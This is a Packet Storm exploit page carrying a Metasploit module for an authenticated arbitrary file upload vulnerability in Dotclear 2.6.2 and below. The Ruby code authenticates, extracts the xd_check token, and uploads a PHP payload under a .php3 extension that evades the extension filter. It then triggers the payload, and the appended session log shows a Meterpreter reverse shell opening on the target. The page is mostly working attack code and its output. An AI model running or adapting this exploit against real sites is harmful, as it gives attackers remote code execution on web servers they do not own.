exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dotclear Media Manager Authenticated Arbitrary File Upload

Dotclear Media Manager Authenticated Arbitrary File Upload
Posted May 22, 2014
Authored by EgiX, Brandon Perry | Site metasploit.com

This is a Metasploit modules that leverages an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.

tags | exploit, arbitrary, file upload
SHA-256 | fa7134cec4517d630b5ea12c4242fbfc9bfb06e0df1b252b0e24e5fa245675a6

Dotclear Media Manager Authenticated Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'dotclear Media Manager Authenticated Arbitrary File Upload',
'Description' => %q{
The vulnerability exists because of the filemanager::isFileExclude() method not properly verifying the extension of
uploaded files. This method just checks whether the uploaded file name matches the “exclude_pattern” regular expression,
which by default is set to “/\.php$/i”. This could be exploited to execute arbitrary PHP code by uploading a file with
multiple extensions or other extensions (like .php5 or .phtml) which might be handled as PHP scripts. Successful
exploitation of this vulnerability requires an account with permissions to manage media items.
},
'Author' =>
[
'Egidio Romano' #discovery
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://seclists.org/fulldisclosure/2014/May/108']
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'dotclear 2.6.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 21 2014'))

register_options([
OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),
OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']),
], self.class)
end

def check
end

def exploit
post = {
'user_id' => datastore['USERNAME'],
'user_pwd' => datastore['PASSWORD']
}

print_status("Authenticating...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'auth.php'),
'method' => 'POST',
'vars_post' => post
})


if !res or !res.body
fail_with("Server did not respond in an expected way")
end

cookie = res.headers['Set-Cookie']

print_status("Getting xd_check...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'),
'cookie' => cookie
})

if !res or !res.body
fail_with("Server did not respond in an expected way")
end

res.body =~ /name="xd_check" value="(.*)" \/><input type="hidden" name="d"/

xd_check = $1

data = Rex::MIME::Message.new
filename = Rex::Text::rand_text_alpha(8)

data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"')
data.add_part('', nil, nil, 'form-data; name="upfiletitle"')
data.add_part('', nil, nil, 'form-data; name="d"')
data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3')

print_status("Sending payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='),
'method' => 'POST',
'cookie' => cookie,
'data' => data.to_s,
'ctype' => 'multipart/form-data; boundary=' + data.bound
})

if !res or !res.body
fail_with("Server did not respond in an expected way")
end

#do something with res

print_status("Popping shell...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3')
})
end
end

__END__
msf exploit(dotclear_file_upload) > show options

Module options (exploit/multi/http/dotclear_file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD fdsafdsa yes The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.114 yes The target address
RPORT 80 yes The target port
TARGETURI /dotclear yes The full URI path to the instance
USERNAME fdsa yes The username to authenticate with
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 dotclear 2.6.2


msf exploit(dotclear_file_upload) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Authenticating...
[*] Getting xd_check...
[*] Sending payload...
[*] Popping shell...
[*] Sending stage (39848 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500

meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686
Meterpreter : php/php
meterpreter >


Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close